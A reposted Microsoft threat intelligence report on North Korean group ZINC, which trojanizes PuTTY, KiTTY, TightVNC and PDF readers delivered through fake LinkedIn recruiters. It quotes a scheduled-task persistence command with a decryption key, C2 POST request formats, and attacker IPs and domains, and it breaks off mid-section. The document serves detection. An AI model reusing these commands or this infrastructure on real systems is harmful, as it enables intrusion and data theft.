{"id":20227,"date":"2022-09-29T09:00:54","date_gmt":"2022-09-29T17:00:54","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/09\/29\/news-13960\/"},"modified":"2022-09-29T09:00:54","modified_gmt":"2022-09-29T17:00:54","slug":"news-13960","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/09\/29\/news-13960\/","title":{"rendered":"ZINC weaponizing open-source software"},"content":{"rendered":"<p><strong>Credit to Author: Katie McCafferty| Date: Thu, 29 Sep 2022 16:00:00 +0000<\/strong><\/p>\n<p>In recent months, Microsoft has detected a wide range of social engineering campaigns using weaponized legitimate open-source software by an actor we track as <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2021\/01\/28\/zinc-attacks-against-security-researchers\/\">ZINC<\/a>. Microsoft Threat Intelligence Center (MSTIC) observed activity targeting employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia. Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on espionage, data theft, financial gain, and network destruction.<\/p>\n<p>Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.<\/p>\n<p>MSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF\/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.&nbsp;The ongoing campaign related to the weaponized PuTTY was also reported by <a href=\"https:\/\/www.mandiant.com\/resources\/blog\/dprk-whatsapp-phishing\" target=\"_blank\" rel=\"noreferrer noopener\">Mandiant<\/a> earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.<\/p>\n<p>Microsoft Defender for Endpoint provides comprehensive protection against tools and custom malware used by ZINC, including ZetaNile. The hunting queries provided at the end of this blog will help customers comprehensively search their environments for relevant indicators. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.&nbsp;<\/p>\n<h2>Who is ZINC?&nbsp;<\/h2>\n<p>ZINC is a highly operational, destructive, and sophisticated nation-state activity group. Active since 2009, the activity group gained further public notoriety in 2014 following their successful attack against Sony Pictures Entertainment. ZINC is known to use a variety of custom remote access tools (RATs) as part of their arsenal, including those detected by Microsoft as FoggyBrass and PhantomStar.&nbsp;&nbsp;<\/p>\n<p>Microsoft researchers have observed spear-phishing as a primary tactic of ZINC actors, but they have also been observed using strategic website compromises and social engineering across social media to achieve their objectives. ZINC targets employees of companies it\u2019s attempting to infiltrate and seeks to coerce these individuals into installing seemingly benign programs or opening weaponized documents that contain malicious macros. Targeted attacks have also been carried out <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2021\/01\/28\/zinc-attacks-against-security-researchers\/\">against security researchers<\/a> over Twitter and LinkedIn.<\/p>\n<p>ZINC attacks appear to be motivated by traditional cyberespionage, theft of personal and corporate data, financial gain, and corporate network destruction. ZINC attacks bear many hallmarks of state-sponsored activities, such as heightened operational security, sophisticated malware that evolves over time, and politically motivated targeting.<\/p>\n<p>ZINC, tracked by other security companies as Labyrinth Chollima and Black Artemis, has been observed conducting this campaign from late April to mid-September 2022.<\/p>\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign-1024x556.png\" alt=\"Attack chain diagram of ZINC campaign showing steps and related activities\" class=\"wp-image-122725\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign-1024x556.png 1024w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign-300x163.png 300w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign-768x417.png 768w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign-1536x834.png 1536w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-5b.-Attack-flow-diagram-for-recent-ZINC-campaign.png 1603w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Figure 1. Attack flow diagram for recent ZINC campaign<\/figcaption><\/figure>\n<h2>Observed actor activity<\/h2>\n<h3>Impersonation and establishing contact<\/h3>\n<p>LinkedIn Threat Prevention and Defense detected ZINC creating fake profiles claiming to be recruiters working at technology, defense, and media entertainment companies, with the goal of moving targets away from LinkedIn and to the encrypted messaging app WhatsApp for the delivery of malware. ZINC primarily targeted engineers and technical support professionals working at media and information technology companies located in the UK, India, and the US. Targets received outreach tailored to their profession or background and were encouraged to apply for an open position at one of several legitimate companies. In accordance with their policies, for accounts identified in these attacks, LinkedIn quickly terminated any accounts associated with inauthentic or fraudulent behavior.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"960\" height=\"523\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-1.-Fraudlent-recruiter-profile.png\" alt=\"Fraudulent recruiter profile\" class=\"wp-image-122617\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-1.-Fraudlent-recruiter-profile.png 960w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-1.-Fraudlent-recruiter-profile-300x163.png 300w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-1.-Fraudlent-recruiter-profile-768x418.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><figcaption>Figure 2. Fraudulent recruiter profile<\/figcaption><\/figure>\n<h3>Multiple methods used for delivery of ZetaNile<\/h3>\n<p>MSTIC has observed at least five methods of trojanized open-source applications containing the malicious payload and shellcode that is tracked as the ZetaNile malware family. The ZetaNile implants, also known as BLINDINGCAN, have been covered in <a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/analysis-reports\/ar20-232a\">CISA<\/a> and <a href=\"https:\/\/blogs.jpcert.or.jp\/en\/2020\/09\/BLINDINGCAN.html\">JPCERT<\/a> reports. The implant DLLs in the ZetaNile malware family are either packed with commercial software protectors such as Themida and VMProtect or are encrypted using custom algorithms. The payload in the malicious DLL is decrypted using a custom key, passed as part of the DLL search order hijacking of the legitimate Windows process, as shown in Figure 3. The ZetaNile implants use unique custom encryption methods or AES encryption to generate command and control (C2) HTTP requests to known compromised C2 domains. By encoding the victim information in the parameters for common keywords like <em>gametype<\/em> or <em>bbs <\/em>in the HTTP POSTs, these C2 communications can blend in with legitimate traffic.<\/p>\n<h3>Weaponization of SSH clients<\/h3>\n<p>Once they have established a connection with their target, ZINC operationalized malicious versions of two SSH clients, PuTTY and KiTTY, that acted as the entry vector for the ZetaNile implant. Both utilities provide terminal emulator support for different networking protocols, making them attractive programs for individuals commonly targeted by ZINC. The weaponized versions were often delivered as compressed ZIP archives or ISO files. Within that archive, the recipient is provided a <em>ReadMe.txt<\/em> and an executable file to run. As part of the evolution of ZINC\u2019s malware development, and in an effort to evade traditional defenses, running the included executable does not drop the ZetaNile implant. For ZetaNile to be deployed, the SSH utility requires the IP provided in the <em>ReadMe.txt<\/em> file. An example of the content of that file is provided below:<\/p>\n<pre class=\"wp-block-preformatted\">Server: 137[.]184[.]15[.]189 User: [redacted] Pass: [redacted] <\/pre>\n<h4>Weaponized PuTTY malware<\/h4>\n<p>ZINC has been using trojanized PuTTY as part of its attack chain for many years, and this most recent variant establishes persistence on compromised devices by utilizing scheduled tasks. This activity was recently reported by Mandiant. The malicious <em>PUTTY.exe<\/em> is configured to install the Event Horizon malware in <em>C:ProgramDatacolorui.dll<\/em> and subsequently copy <em>C:WindowsSystem32colorcpl.exe<\/em> to <em>C:ProgramDatacolorcpl.exe<\/em>.&nbsp; By using DLL search order hijacking, ZINC can load the second stage malware, <em>colurui.dll<\/em>, and decode the payload with the key \u201c0CE1241A44557AA438F27BC6D4ACA246\u201d to be used for command and control. Upon successful connection to the C2 server, the attackers can install additional malware on the compromised device for other tasks.<\/p>\n<p>Lastly, persistence is established with the creation of a daily scheduled task, <em>PackageColor<\/em>, as part of the configuration for the weaponized PuTTY. ZINC accomplishes this with the following command:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"960\" height=\"60\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-2.-PuTTY-scheduled-task-as-part-of-persistence-2.png\" alt=\"PuTTY scheduled task as part of persistence\" class=\"wp-image-122698\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-2.-PuTTY-scheduled-task-as-part-of-persistence-2.png 960w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-2.-PuTTY-scheduled-task-as-part-of-persistence-2-300x19.png 300w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-2.-PuTTY-scheduled-task-as-part-of-persistence-2-768x48.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><figcaption>Figure 3. PuTTY &#8211; scheduled task as part of persistence<\/figcaption><\/figure>\n<h4>Weaponized KiTTY malware<\/h4>\n<p>While ZINC has utilized weaponized PuTTY for many years, ZINC has only recently expanded their capabilities to include weaponizing a fork of PuTTY called KiTTY. The executable first collects the username and hostname of the victim system and sends that information to a hardcoded IP 172[.]93[.]201[.]253 over TCP\/22. Upon successful TCP connection to the server at 137[.]184[.]15[.]189, the malicious KiTTY executable then deploys the malware as<em> %AppData%mscoree.dll <\/em>following multiple rounds of decoding. The <em>mscoree.dll<\/em> file is the embedded payload, detected as EventHorizon, in the ZetaNile malware family. Similar to ZINC\u2019s version of PuTTY, the actor uses DLL search order hijacking to load malicious DLL files that perform tasks within the context of these legitimate Windows processes, specifically through <em>%<\/em><em>AppData%KiTTY%PresentationHost.exe -EmbeddingObject<\/em>.<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"524\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-3b.-KiTTY-DLL-search-order-hijacking-1024x524.png\" alt=\"Screenshot of Windows process that ZINC hijacks through DLL search order hijacking\" class=\"wp-image-122737\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-3b.-KiTTY-DLL-search-order-hijacking-1024x524.png 1024w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-3b.-KiTTY-DLL-search-order-hijacking-300x153.png 300w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-3b.-KiTTY-DLL-search-order-hijacking-768x393.png 768w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-3b.-KiTTY-DLL-search-order-hijacking.png 1406w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption>Figure 4. KiTTY &#8211; DLL search order hijacking<\/figcaption><\/figure>\n<p>The <em>mscoree.dll<\/em> malware is modularized in such a way that, upon successful connection to the compromised C2 domain, the attackers can install additional malware on the target system as needed using the existing C2 communication, such as executing <em>C:ProgramDataCiscofixmapi.exe -s AudioEndpointBuilder<\/em> to load malicious <em>mapistub.dll<\/em> from the compromised C2 server. The HTTP POST requests contain the hardcoded user agent string with misspelled \u201cEdge\u201d, as detailed below, and contain a unique ID for the field <em>gametype<\/em> and the hardcoded value for the field <em>type <\/em>for malware campaign tracking purposes:<\/p>\n<figure class=\"wp-block-table has-small-font-size\">\n<table>\n<tbody>\n<tr>\n<td><code>POST \/wp-includes\/php-compat\/compat.php HTTP\/1.1 <br \/>Accept: text\/* <br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.5005.63 Safari\/537.36 <strong>Edg<\/strong>\/100.0.1185.39 <br \/>Content-Type: application\/x-www-form-urlencoded <br \/>Content-Length: 39 <br \/>Host: olidhealth[.]com <br \/>Connection: Keep-Alive <br \/>Cache-Control: no-cache &nbsp; <\/p>\n<p><strong>gametype<\/strong>=[UniqueId]&amp;<strong>type<\/strong>=<strong>O8Akm8aV09Nw412KoWJds<\/strong> <strong>&nbsp;<\/strong><\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h3>Weaponized TightVNC Viewer<\/h3>\n<p>Beginning in September 2022, ZINC was observed utilizing a trojanized TightVNC Viewer that was delivered to a target alongside a weaponized SSH utility over WhatsApp. This malware has a unique PDBPath:<\/p>\n<pre class=\"wp-block-preformatted\">N:2.MyDevelopment3.Tools_Development4.TightVNCCustomizeMunna_Customizetightvncx64\\Releasetvnviewer.pdb<\/pre>\n<p>The weaponized versions of TightVNC Viewer often were delivered as compressed ZIP archives or job description-themed ISO files via online platforms such as WhatsApp. Within that archive, the recipient is provided a <em>ReadMe.txt<\/em> and an executable file to run. The .txt file has the following content:<\/p>\n<pre class=\"wp-block-preformatted\">Platform: 2nd from the list User: [redacted] Pass: [redacted]<\/pre>\n<p>As part of the threat actor\u2019s latest malware technique to evade traditional defenses, the malicious TightVNC Viewer has a pre-populated list of remote hosts, and it\u2019s configured to install the backdoor only when the user selects <em>ec2-aet-tech.w-ada[.]amazonaws<\/em> from the drop-down menu in the TightVNC Viewer, as shown in Figure 5:<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"432\" height=\"135\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-6.-Weaponized-TightVNC-Viewer-\u2013-user-interface.png\" alt=\"Weaponized TightVNC Viewer \u2013 user interface\" class=\"wp-image-122632\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-6.-Weaponized-TightVNC-Viewer-\u2013-user-interface.png 432w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-6.-Weaponized-TightVNC-Viewer-\u2013-user-interface-300x94.png 300w\" sizes=\"auto, (max-width: 432px) 100vw, 432px\" \/><figcaption>Figure 5. Weaponized TightVNC Viewer \u2013 user interface<\/figcaption><\/figure>\n<p>The malware was configured to send the username and hostname to IP 44[.]238[.]74[.]84 on TCP\/22 as part of the victim check-in with the C2 and establish VNC connections to the same IP on port TCP\/5900. Once a successful connection is established to the server IP, the embedded second stage DLL payload from <em>TightVNC.exe<\/em> is loaded in memory to establish C2 communication to a known compromised domain.<\/p>\n<h3>Weaponization of Sumatra PDF reader and muPDF\/Subliminal Recording installer<\/h3>\n<p>ZINC has operationalized malicious versions of two PDF readers, Sumatra PDF and muPDF\/Subliminal Recording installer, that act as the entry vector for the ZetaNile implant. This delivery mechanism is often utilized in relation to fraudulent job postings delivered to job-seeking targets in the IT and defense sector. The weaponized versions were often delivered as compressed ZIP archives. Within that archive, the recipient is provided with an executable file to run. While the malicious Sumatra PDF reader is a fully functional PDF reader that can load the malicious implant from a fake PDF, the muPDF\/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files.<\/p>\n<h4>Trojanized Sumatra PDF Reader<\/h4>\n<p>The trojanized version of Sumatra PDF Reader named <em>SecurePDF.exe<\/em> has been utilized by ZINC since at least 2019 and remains a unique ZINC tradecraft. <em>SecurePDF.exe<\/em> is a modularized loader that can install the ZetaNile implant by loading a weaponized job application themed file with a .PDF extension. The fake PDF contains a header \u201cSPV005\u201d, a decryption key, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when the file is opened.<\/p>\n<p>Once loaded in memory, the second stage malware is configured to send the victim\u2019s system hostname and device information using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The attackers can install additional malware onto the compromised devices using the C2 communication as needed.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"960\" height=\"626\" src=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-7.-SecurePDF-interface.png\" alt=\"SecurePDF interface\" class=\"wp-image-122635\" srcset=\"https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-7.-SecurePDF-interface.png 960w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-7.-SecurePDF-interface-300x196.png 300w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-7.-SecurePDF-interface-768x501.png 768w, https:\/\/www.microsoft.com\/security\/blog\/uploads\/securityprod\/2022\/09\/Figure-7.-SecurePDF-interface-200x130.png 200w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><figcaption>Figure 6. SecurePDF interface<\/figcaption><\/figure>\n<h4>Trojanized muPDF\/Subliminal Recording installer<\/h4>\n<p>Within the trojanized version of muPDF\/Subliminal Recording installer, <em>setup.exe<\/em> is configured to check if the file path <em>ISSetupPrerequisitesSetup64.exe<\/em> exists and write <em>C:colrctlcolorui.dll<\/em> on disk after extracting the embedded executable inside <em>setup.exe<\/em>. It then copies <em>C:WindowsSystem32ColorCpl.exe<\/em> to <em>C:ColorCtrlColorCpl.exe<\/em>. For the second stage malware, the malicious installer creates a new process <em>C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6D<\/em>, and the argument <em>C3A9B30B6A313F289297C9A36730DB6D<\/em> gets passed on to <em>colorui.dll <\/em>as a decryption key<em>.<\/em> The DLL <em>colorui.dll, <\/em>which Microsoft is tracking as the EventHorizon malware family, is injected into <em>C:WindowsSystemcredwiz.exe<\/em> or <em>iexpress.exe<\/em> to send C2 HTTP requests as part of the victim check-in process and to get an additional payload.<\/p>\n<figure class=\"wp-block-table has-small-font-size\">\n<table>\n<tbody>\n<tr>\n<td><code>POST \/support\/support.asp HTTP\/1.1 <br \/>Cache-Control: no-cache <br \/>Connection: close <br \/>Content-Type: application\/x-www-form-urlencoded <br \/>Accept: *\/* <br \/>User-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; <br \/>Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; <br \/>InfoPath.3; .NET4.0C; .NET4.0E) <br \/>Content-Length: 125 <br \/>Host: www.elite4print[.]com &nbsp; <\/p>\n<p>bbs=[encrypted payload]= &amp;article=[encrypted payload] <\/code>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>Microsoft will continue to monitor ZINC activity and implement protections for our customers. The current detections and IOCs in place across our security products are detailed below.<\/p>\n<h2>Recommended customer actions<\/h2>\n<p>The techniques used by the actor and described in the \u201cObserved actor activity\u201d section can be mitigated by adopting the security considerations provided below:<\/p>\n<ul>\n<li>Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.<\/li>\n<li>Block in-bound traffic from IPs specified in the \u201cIndicators of compromise\u201d table.<\/li>\n<li>Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.<\/li>\n<li>Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity.&nbsp; <em>NOTE:<\/em> Microsoft strongly encourages all customers download and use password-less solutions like <a href=\"https:\/\/www.microsoft.com\/account\/authenticator\/\">Microsoft Authenticator<\/a> to secure your accounts.<\/li>\n<li>Educate end users about <a href=\"https:\/\/docs.microsoft.com\/windows\/security\/threat-protection\/intelligence\/prevent-malware-infection\">preventing malware infections<\/a>, including by ignoring or deleting unsolicited and unexpected emails with ISO attachments. Encourage end users to practice good credential hygiene\u2014limit the use of accounts with local or domain admin privileges and turn on <a href=\"https:\/\/support.microsoft.com\/windows\/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f\">Microsoft Defender Firewall<\/a> to prevent malware infection and stifle propagation.<\/li>\n<li>Educate end users about <a href=\"https:\/\/docs.microsoft.com\/windows\/security\/threat-protection\/intelligence\/prevent-malware-infection\">protecting personal and business information<\/a> in social media, filtering unsolicited communication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.<\/li>\n<\/ul>\n<h2>Indicators of compromise (IOCs)<\/h2>\n<p>The below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.<\/p>\n<figure class=\"wp-block-table is-style-regular\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th>Indicator<\/th>\n<th>Type<\/th>\n<th>Description<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Amazon-KiTTY.exe<\/td>\n<td>File name<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Amazon_IT_Assessment.iso<\/td>\n<td>File name<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>IT_Assessment.iso<\/td>\n<td>File name<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>amazon_assessment_test.iso<\/td>\n<td>File name<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>SecurePDF.exe<\/td>\n<td>File name<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>C:ProgramDataCommscolorui.dll<\/td>\n<td>File path<\/td>\n<td>Malicious PuTTY implant<\/td>\n<\/tr>\n<tr>\n<td>%APPDATA%KiTTYmscoree.dll<\/td>\n<td>File path<\/td>\n<td>Malicious KiTTY implant<\/td>\n<\/tr>\n<tr>\n<td>172.93.201[.]253<\/td>\n<td>IP address<\/td>\n<td>Adversary C2 server<\/td>\n<\/tr>\n<tr>\n<td>137.184.15[.]189<\/td>\n<td>IP address<\/td>\n<td>Adversary SSH server<\/td>\n<\/tr>\n<tr>\n<td>44.238.74[.]84<\/td>\n<td>IP address<\/td>\n<td>Hard-coded VNC Server IP for malicious TightVNC<\/td>\n<\/tr>\n<tr>\n<td>c:windowssystem32schtasks.exe \/CREATE \/SC DAILY \/MO 1 \/ST 10:30 \/TR &#8220;C:WindowsSystem32cmd.exe \/c start \/b C:ProgramDataPackageColorcolorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246&#8221; \/TN PackageColor \/F<\/td>\n<td>Scheduled task name<\/td>\n<td>Putty.exe &#8211; Scheduled task<\/td>\n<\/tr>\n<tr>\n<td>1492fa04475b89484b5b0a02e6ba3e52544c264c294b57210404b96b65e63266<\/td>\n<td>SHA-256<\/td>\n<td>Malicious Putty.exe<\/td>\n<\/tr>\n<tr>\n<td>aaad412aeb0f98c2c27bb817682f08673902a48b65213091534f96fe6f5494d9<\/td>\n<td>SHA-256<\/td>\n<td>Malicious colorui.dll<\/td>\n<\/tr>\n<tr>\n<td>63cddab76e9d63e3cbea421b607342735d924e462c40f3917b1b5fbdf8d4a20d<\/td>\n<td>SHA-256<\/td>\n<td>Malicious Amazon-Kitty.exe<\/td>\n<\/tr>\n<tr>\n<td>e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10<\/td>\n<td>SHA-256<\/td>\n<td>Malicious KiTTY implant for mscoree.dll<\/td>\n<\/tr>\n<tr>\n<td>c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf<\/td>\n<td>SHA-256<\/td>\n<td>Weaponized Sumatra PDFReader.exe<\/td>\n<\/tr>\n<tr>\n<td>71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55<\/td>\n<td>SHA-256<\/td>\n<td>Weaponized muPDF\/Subliminal Recording installer<\/td>\n<\/tr>\n<tr>\n<td>olidhealth[.]com\/wp-includes\/php-compat\/compat.php<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>hurricanepub[.]com\/include\/include.php<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>turnscor[.]com\/wp-includes\/contacts.php<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>elite4print[.]com\/support\/support.asp<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>cats.runtimerec[.]com\/db\/dbconn.php<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>recruitment.raystechserv[.]com\/lib\/artichow\/BarPlotDashboard.object.php<\/td>\n<td>Compromised domain<\/td>\n<td>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.5005.63 Safari\/537.36 Edg\/100.0.1185.39<\/td>\n<td>User agent<\/td>\n<td>Hardcoded Kitty.exe UA<\/td>\n<\/tr>\n<tr>\n<td>Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)<\/td>\n<td>User agent<\/td>\n<td>Hardcoded SecurePDF.exe UA<\/td>\n<\/tr>\n<tr>\n<td>N:2.MyDevelopment3.Tools_Development4.TightVNCCustomizeMunna_Customizetightvncx64\\Releasetvnviewer.pdb<\/td>\n<td>PDBPath<\/td>\n<td>PDBPath for malicious TightVNC<\/td>\n<\/tr>\n<tr>\n<td>37e30dc2faaabaf93f0539ffbde032461ab63a2c242fbe6e1f60a22344c8a334<\/td>\n<td>SHA-256<\/td>\n<td>Malicious TightVNC<\/td>\n<\/tr>\n<tr>\n<td>14f736b7df6a35c29eaed82a47fc0a248684960aa8f2222b5ab8cdad28ead745<\/td>\n<td>SHA-256<\/td>\n<td>Malicious TightVNC<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>NOTE:<\/strong> These indicators should not be considered exhaustive for this observed activity.<\/p>\n<h2>Detections<\/h2>\n<h3>Microsoft Defender Antivirus<\/h3>\n<p><a href=\"https:\/\/learn.microsoft.com\/microsoft-365\/security\/defender-endpoint\/microsoft-defender-antivirus-windows\">Microsoft Defender Antivirus<\/a> and Microsoft Defender for Endpoint customers should look for the following family names for activity related to these attacks:<\/p>\n<ul>\n<li>ZetaNile<\/li>\n<li>EventHorizon<\/li>\n<li>FoggyBrass<\/li>\n<li>PhantomStar<\/li>\n<\/ul>\n<h3>Microsoft Defender for Endpoint<\/h3>\n<p>The following <a href=\"https:\/\/www.microsoft.com\/security\/business\/endpoint-security\/microsoft-defender-endpoint\">Microsoft Defender for Endpoint<\/a> alerts could indicate activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.<\/p>\n<ul>\n<li>Suspicious Task Scheduler activity<\/li>\n<li>Suspicious connection to remote service<\/li>\n<li>A suspicious file was observed<\/li>\n<li>An executable loaded an unexpected dll<\/li>\n<li>Possible theft of remote session credentials<\/li>\n<li>Suspicious connection to remote service<\/li>\n<\/ul>\n<h2>Advanced hunting queries<\/h2>\n<h3>Microsoft Sentinel<\/h3>\n<p>Microsoft Sentinel customers can use the following queries to look for the related malicious indicators in their environments.<\/p>\n<p><strong>Identify ZINC IP\/domain\/hash IOC<\/strong><\/p>\n<p>This query identifies a match across various data feeds for IP\/Domain IOCs related to the Zinc actor as shared in this blog post.<\/p>\n<p><a href=\"https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_IP_Domain_Hash_IOC.yaml\">https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_IP_Domain_Hash_IOC.yaml<\/a><\/p>\n<p><strong>Identify ZINC filename\/command line IOC<\/strong><\/p>\n<p>To locate possible Zinc Filename\/command line activity shared in the blog Microsoft Sentinel customers can use the queries below:<\/p>\n<p><a href=\"https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_Filename_Commandline_IOC.yaml\">https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_Filename_Commandline_IOC.yaml<\/a><\/p>\n<p><strong>Identify ZINC AV hits IOC<\/strong><\/p>\n<p>This query looks for Microsoft Defender AV detections related to Zinc actor as shared in the blog post:<\/p>\n<p><a href=\"https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_AVHits_IOC.yaml\">https:\/\/github.com\/Azure\/Azure-Sentinel\/blob\/master\/Detections\/MultipleDataSources\/ZincOctober2022_AVHits_IOC.yaml<\/a><\/p>\n<h3>Microsoft 365 Defender<\/h3>\n<p>To locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:<\/p>\n<p><strong>Suspicious mapistub.dll file 